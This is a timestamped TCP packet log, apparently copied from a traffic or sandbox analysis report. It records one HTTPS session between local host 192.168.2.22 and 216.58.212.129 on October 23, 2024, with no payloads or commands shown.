                                                                                                                                                                        Oct 23, 2024 17:27:00.391813040 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.391833067 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.391881943 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.391889095 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.391896963 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.391940117 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.391947031 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392276049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392335892 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.392337084 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392349005 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392393112 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.392584085 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392672062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392725945 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.392735004 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392965078 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.392992020 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.393394947 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.393407106 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432255030 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432288885 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432323933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432356119 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.432382107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432399035 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.432740927 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432769060 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432790995 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.432800055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432830095 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.432842016 CEST49172443192.168.2.22216.58.212.129
Oct 23, 2024 17:27:00.432851076 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.432877064 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.432887077 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.432894945 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.432931900 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.433264017 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.474908113 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.474950075 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.474978924 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.475022078 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.475191116 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.475191116 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.475223064 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.489145994 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.489303112 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.489322901 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497446060 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497554064 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.497572899 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497606993 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497680902 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.497688055 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497740030 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.497788906 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.497796059 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508641958 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508680105 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508764982 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.508774042 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508785009 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508833885 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508865118 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.508876085 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.508923054 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.509213924 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509305000 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509361982 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.509370089 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509717941 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509752035 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509780884 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509792089 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.509799004 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509820938 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.509898901 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.509949923 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.509957075 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.510416031 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.510471106 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.510488987 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549292088 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549330950 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549364090 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549443960 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.549463034 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549515009 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549673080 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.549679995 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549814939 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549843073 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549864054 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.549870014 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.549910069 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.549916029 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.550400019 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.550448895 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.550455093 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.591919899 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.591957092 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.591984987 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.592012882 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.592047930 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.592061043 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.592080116 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.592092037 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.592247009 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.606111050 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614651918 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614692926 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614729881 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614748955 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.614762068 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614914894 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614943027 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.614963055 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.614963055 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.614974976 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.615020990 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626023054 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626195908 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626235008 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626271009 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626275063 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626287937 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626317978 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626341105 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626389980 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626396894 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626713991 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626763105 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626768112 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626779079 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.626818895 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.626825094 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627212048 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627258062 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627264023 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.627269983 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627325058 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.627331972 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627648115 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.627700090 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.627707005 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666277885 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666320086 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666359901 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666395903 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.666409969 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666532040 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666564941 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.666583061 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.666588068 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666892052 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.666944981 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.666953087 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667025089 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667077065 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.667083979 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667354107 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667388916 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667406082 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.667412996 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.667455912 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.667541981 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709059954 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709101915 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709147930 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709178925 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709242105 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.709265947 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.709278107 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.723261118 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.723308086 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.723337889 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.723345041 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.723504066 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.732136965 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.732249022 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.732286930 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.732299089 CEST  49172  443    192.168.2.22    216.58.212.129
Oct 23, 2024 17:27:00.732307911 CEST  443    49172  216.58.212.129  192.168.2.22
Oct 23, 2024 17:27:00.732347012 CEST  49172  443    192.168.2.22    216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.732415915 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743098974 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743184090 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.743195057 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743432999 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743525028 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743551970 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743583918 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.743592978 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743602037 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.743761063 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.743803978 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.743809938 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744035006 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744067907 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744081020 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.744092941 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744136095 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.744266987 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744380951 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744426966 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.744432926 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744826078 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744872093 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.744879007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744927883 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.744971037 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.744976997 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783658028 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783703089 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783741951 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783783913 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783813953 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.783814907 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783827066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.783896923 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.783896923 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.783910036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784167051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784198046 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784471989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784518957 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.784519911 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784518957 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.784533024 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784687042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784723997 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784759045 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784768105 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.784768105 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.784775019 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.784820080 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.826059103 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.826160908 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.826196909 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.826225042 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.826231003 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.826242924 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.827435017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.840812922 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.841069937 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.841123104 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.841142893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.849342108 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.849385977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.849421024 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.849420071 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.849435091 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.849484921 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.861044884 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.861079931 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.861156940 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.861169100 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.861191034 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.900883913 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.900921106 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.901077986 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.901077986 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.901077986 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.901097059 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.902147055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.902175903 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.902231932 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.902245998 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.902256012 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.966459036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.966500998 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.966520071 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.966542959 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.966556072 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.966556072 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.978081942 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.978116989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.978149891 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.978152037 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.978168011 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:00.978180885 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.978182077 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:00.978337049 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.017741919 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.017788887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.017852068 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.017868042 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.018141031 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.018856049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.018894911 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.019016027 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.019016027 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.019030094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.075215101 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.075253963 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.075371027 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.075385094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.075457096 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.075457096 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.094588041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.564377069 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.564378023 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.564387083 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605413914 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605443001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605453014 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605469942 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605511904 CEST49172443192.168.2.22216.58.212.129
